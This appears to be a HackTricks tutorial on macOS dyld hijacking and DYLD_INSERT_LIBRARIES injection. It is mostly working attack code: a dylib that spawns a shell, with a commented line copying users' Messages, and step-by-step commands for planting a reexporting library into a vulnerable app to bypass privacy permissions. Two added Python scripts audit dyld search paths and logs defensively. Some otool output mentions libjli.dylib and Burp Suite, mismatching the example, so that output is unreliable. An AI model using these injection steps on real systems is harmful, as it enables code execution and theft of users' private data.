macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

DYLD_INSERT_LIBRARIES Basic example

A basic example of a library to inject that spawns a shell:

// gcc -dynamiclib -o inject.dylib inject.c

#include <syslog.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

// The constructor runs when dyld loads the library, before the target's main().
__attribute__((constructor))
void myconstructor(int argc, const char **argv)
{
    syslog(LOG_ERR, "[+] dylib injected in %s\n", argv[0]);
    printf("[+] dylib injected in %s\n", argv[0]);
    // Replace the process image with a shell. A NULL argv is not portable,
    // so pass a proper argument vector.
    char *const shell_argv[] = {"/bin/bash", NULL};
    execv("/bin/bash", shell_argv);
    //system("cp -r ~/Library/Messages/ /tmp/Messages/");
}

Binary to attack:

// gcc hello.c -o hello
#include <stdio.h>

int main()
{
    printf("Hello, World!\n");
    return 0;
}

Injection:

DYLD_INSERT_LIBRARIES=inject.dylib ./hello

Dyld Hijacking Example

The targeted vulnerable binary is /Applications/VulnDyld.app/Contents/Resources/lib/binary.

codesign -dv --entitlements :- "/Applications/VulnDyld.app/Contents/Resources/lib/binary"
[...]com.apple.security.cs.disable-library-validation[...]

From the information gathered previously we know that it doesn't check the signature of the loaded libraries and it tries to load libraries from:

  • /Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib

  • /Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib

However, the first one doesn't exist:

pwd
/Applications/VulnDyld.app

find ./ -name lib.dylib
./Contents/Resources/lib2/lib.dylib
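The two manual checks above (which paths dyld will try, and which of them are absent) can be automated from the defender's side. The Python below is an added example, not HackTricks' tooling and not part of the original page. It parses `otool -l` output, expands @executable_path, @loader_path and @rpath the way dyld does for a main executable, reads the entitlement blob for com.apple.security.cs.disable-library-validation, and reports every search slot that dyld tries before the file that actually resolves but that does not exist. The otool excerpt, entitlement plist and on-disk file set are constructed to mirror this page's VulnDyld bundle (assumptions, not captured output); `exists` defaults to os.path.exists so the same function runs against a real bundle.

```python
"""Static audit of where dyld will search for a binary's dependencies.

Added example, not HackTricks' tooling: parses `otool -l` output, expands
@executable_path/@loader_path/@rpath as dyld does for a main executable, and
flags search slots tried before the resolving file that do not exist on disk.
"""
import os
import plistlib
import posixpath
import re

BINARY = "/Applications/VulnDyld.app/Contents/Resources/lib/binary"

# Constructed `otool -l` excerpt for the binary above; only the relevant
# load commands are mirrored, real output carries many more.
SAMPLE_OTOOL_OUTPUT = """\
Load command 12
          cmd LC_LOAD_DYLIB
      cmdsize 56
         name @rpath/lib.dylib (offset 24)
   time stamp 2 Thu Jan  1 01:00:02 1970
Load command 13
          cmd LC_LOAD_DYLIB
      cmdsize 56
         name /usr/lib/libSystem.B.dylib (offset 24)
Load command 14
          cmd LC_RPATH
      cmdsize 32
         path @executable_path/. (offset 12)
Load command 15
          cmd LC_RPATH
      cmdsize 48
         path @executable_path/../lib2 (offset 12)
"""

# Constructed entitlements in the shape `codesign -d --entitlements :-` prints.
SAMPLE_ENTITLEMENTS = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>com.apple.security.cs.disable-library-validation</key><true/>
</dict></plist>
"""

# Constructed view of the bundle: lib2/lib.dylib exists, lib/lib.dylib does not.
SAMPLE_FILES = {BINARY, "/usr/lib/libSystem.B.dylib",
                "/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib"}

_CMD_RE = re.compile(r"^\s*cmd (LC_\w+)\s*$")
_PATH_RE = re.compile(r"^\s*(?:name|path) (.+?) \(offset \d+\)\s*$")
_DEP_CMDS = {"LC_LOAD_DYLIB", "LC_LOAD_WEAK_DYLIB", "LC_REEXPORT_DYLIB", "LC_LOAD_UPWARD_DYLIB"}

def parse_load_commands(otool_text):
    """Return (rpaths, deps): LC_RPATH entries and dylib names in load-command order."""
    rpaths, deps, current = [], [], None
    for line in otool_text.splitlines():
        cmd = _CMD_RE.match(line)
        if cmd:
            current = cmd.group(1)
            continue
        path = _PATH_RE.match(line)
        if path and current == "LC_RPATH":
            rpaths.append(path.group(1))
        elif path and current in _DEP_CMDS:
            deps.append(path.group(1))
    return rpaths, deps

def expand(path, executable):
    """Substitute dyld placeholders; for a main executable @loader_path is its own dir."""
    for token in ("@executable_path", "@loader_path"):
        if path.startswith(token + "/"):
            path = posixpath.dirname(executable) + path[len(token):]
    return posixpath.normpath(path)

def candidate_paths(dep, rpaths, executable):
    """Every location dyld will try for one dependency, in search order."""
    if dep.startswith("@rpath/"):
        rest = dep[len("@rpath/"):]
        return [expand(posixpath.join(rp, rest), executable) for rp in rpaths]
    return [expand(dep, executable)]

def library_validation_disabled(entitlements):
    """True when the binary will load dylibs signed by anyone, or unsigned."""
    ents = plistlib.loads(entitlements)
    return bool(ents.get("com.apple.security.cs.disable-library-validation"))

def audit(otool_text, entitlements, executable, exists=os.path.exists):
    """Per dependency: the resolving path plus the empty slots searched before it."""
    rpaths, deps = parse_load_commands(otool_text)
    findings = []
    for dep in deps:
        cands = candidate_paths(dep, rpaths, executable)
        resolved = next((c for c in cands if exists(c)), None)
        # Slots searched before the resolving one: a file planted there would win,
        # which only matters when library validation is disabled.
        absent = cands if resolved is None else cands[:cands.index(resolved)]
        findings.append({"dependency": dep, "resolved": resolved, "absent_slots": absent})
    return {"library_validation_disabled": library_validation_disabled(entitlements),
            "findings": findings}

if __name__ == "__main__":
    result = audit(SAMPLE_OTOOL_OUTPUT, SAMPLE_ENTITLEMENTS, BINARY, lambda p: p in SAMPLE_FILES)
    print("library validation disabled:", result["library_validation_disabled"])
    for f in result["findings"]:
        print(f["dependency"], "->", f["resolved"] or "NOT FOUND", "| absent first:", f["absent_slots"])
```

Against a real bundle, feed it the output of `otool -l <binary>` and `codesign -d --entitlements :- <binary>` and leave `exists` at its default. An empty absent_slots list for every dependency, or library validation still enforced, means the dyld search order offers nothing to plant a library into; for this page's binary it reports lib/lib.dylib as an absent slot searched before lib2/lib.dylib.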

So, it's possible to hijack it! Create a library that executes some arbitrary code and exports the same functions as the legitimate library by reexporting it. And remember to compile it with the expected versions:

lib.m
#import <Foundation/Foundation.h>

// Runs when dyld loads the hijacking library, before the binary's main().
__attribute__((constructor))
void custom(int argc, const char **argv) {
    NSLog(@"[+] dylib hijacked in %s", argv[0]);
}

Compile it:

gcc -dynamiclib -current_version 1.0 -compatibility_version 1.0 -framework Foundation /tmp/lib.m -Wl,-reexport_library,"/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" -o "/tmp/lib.dylib"
# Note the versions and the reexport

The reexport path created in the library is relative to the loader; let's change it to an absolute path to the library being exported:

# Check the reexport path (it is relative)
otool -l /tmp/lib.dylib| grep REEXPORT -A 2
cmd LC_REEXPORT_DYLIB
cmdsize 48
name @rpath/libjli.dylib (offset 24)

# Change the location of the reexported library to an absolute path
install_name_tool -change @rpath/lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" /tmp/lib.dylib

# Check again
otool -l /tmp/lib.dylib| grep REEXPORT -A 2
cmd LC_REEXPORT_DYLIB
cmdsize 128
name /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24)

Finally, just copy it to the hijacked location:

cp lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib"

And execute the binary and check that the library was loaded:

"/Applications/VulnDyld.app/Contents/Resources/lib/binary"
2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib hijacked in /Applications/VulnDyld.app/Contents/Resources/lib/binary
Usage: [...]

A detailed explanation of how this vulnerability was used to abuse Telegram's camera permissions can be found at https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/

Bigger Scale

If you are planning on trying to inject libraries into unexpected binaries you could check the event messages to find out when the library is loaded inside a process (in this case remove the printf and the /bin/bash execution).

sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "[+] dylib"'
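From the defender's side the same marker tells you which processes actually ended up loading a planted library. The Python below is an added example, not from the page: it parses log lines of the `process[pid:tid] message` shape shown above, plus one line approximating the `log stream --style syslog` layout with a host column and the logging library in parentheses (all lines are constructed here, not captured output), and groups the marker events per process name and PID so one summary covers every affected process.

```python
"""Group "[+] dylib" log markers by process.

Added example, not HackTricks' tooling: the page watches `log stream` for the
marker the injected dylib logs. This parses such lines (constructed below) and
summarises which processes, and which PIDs, the library landed in.
"""
import re
from collections import defaultdict

MARKER = "[+] dylib"

# Constructed lines: the NSLog `process[pid:tid] message` shape shown on this
# page, plus one approximating `log stream --style syslog` (host column and the
# logging library in parentheses); treat the exact layout as illustrative.
SAMPLE_LOG = """\
2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib hijacked in /Applications/VulnDyld.app/Contents/Resources/lib/binary
2023-05-15 15:20:41.010 hello[78812:21797950] [+] dylib injected in ./hello
2023-05-15 15:20:41.011 hello[78812:21797950] Hello, World!
2023-05-15 15:21:02.339123+0200  localhost binary[78830]: (lib.dylib) [+] dylib hijacked in /Applications/VulnDyld.app/Contents/Resources/lib/binary
this line is not in any log format
"""

_LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+(?:[+-]\d{4})?)\s+"
    r"(?:(?P<host>\S+)\s+)?"                              # optional host column
    r"(?P<proc>[^\[\s]+)\[(?P<pid>\d+)(?::\d+)?\]:?\s+"   # proc[pid] or proc[pid:tid]
    r"(?P<msg>.*)$")

def parse_line(line):
    """Split one log line into its fields, or return None if it does not parse."""
    m = _LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["pid"] = int(rec["pid"])
    return rec

def injection_events(log_text):
    """Records whose message carries the marker, with the reported target path."""
    events = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or MARKER not in rec["msg"]:
            continue
        # The dylib logs "... injected in <argv[0]>" or "... hijacked in <argv[0]>".
        after = rec["msg"].split(MARKER, 1)[1]
        rec["target"] = after.split(" in ", 1)[1].strip() if " in " in after else ""
        events.append(rec)
    return events

def summarize(log_text):
    """Map process name -> sorted distinct PIDs in which the marker was logged."""
    pids = defaultdict(set)
    for ev in injection_events(log_text):
        pids[ev["proc"]].add(ev["pid"])
    return {proc: sorted(p) for proc, p in pids.items()}

if __name__ == "__main__":
    for proc, p in summarize(SAMPLE_LOG).items():
        print(f"{proc}: library loaded in PIDs {p}")
```

Pipe the real `log stream --style syslog --predicate ...` output into `summarize` to get the same per-process view live; lines that do not match the layout, or that carry no marker, are ignored rather than raising.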